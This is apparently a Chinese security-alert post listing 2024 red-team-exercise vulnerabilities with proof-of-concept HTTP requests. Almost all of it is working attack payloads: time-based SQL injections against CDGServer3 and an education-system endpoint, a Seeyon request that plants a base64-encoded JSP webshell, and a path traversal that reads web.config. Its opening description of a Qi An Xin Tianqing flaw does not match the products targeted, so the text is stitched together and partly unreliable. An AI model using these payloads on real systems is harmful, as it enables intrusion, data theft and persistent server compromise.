[2024HW - 1day] 漏洞预警 含部分POC

暂无漏洞描述：奇安信天擎V10是一款终端安全软件，经供应链厂商反馈，该软件服务端存在0day漏洞，需增打安全补丁修复。受影响产品（版本）：奇安信天擎V10服务端。

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1Host: HostnameCookie: JSESSIONID=xxxx;Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Priority: u=0, iConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 98
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR D ELAY'0:0:5'--

GET /seeyon/constDef.do?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22../webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder().decode(%22PCUKaWYocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImYiKSE9bnVsbCkobmV3IGphdmEuaW8uRmlsZU91dHB1dFN0cmVhbShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aCgiXFwiKStyZXF1ZXN0LmdldFBhcmFtZXRlcigiZiIpKSkud3JpdGUocmVxdWVzdC5nZXRQYXJhbWV0ZXIoInQiKS5nZXRCeXRlcygpKTsKJT4=%22)));%22&constDescription=123&constType=4 HTTP/1.1Host: Hostname

GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: HostnameUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

POST /CDGServer3/NoticeAjax;Service HTTP/1.1Host: ip:8443Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a png,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate   Sec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Priority: u=0, iConnection: closeContent-Length: 98Content-Type: application/x-www-form-urlencoded
command=delNotice&noticeId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DE LAY '0:0:5'--

GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FRO M+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1Host: HostnameUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

暂无

暂无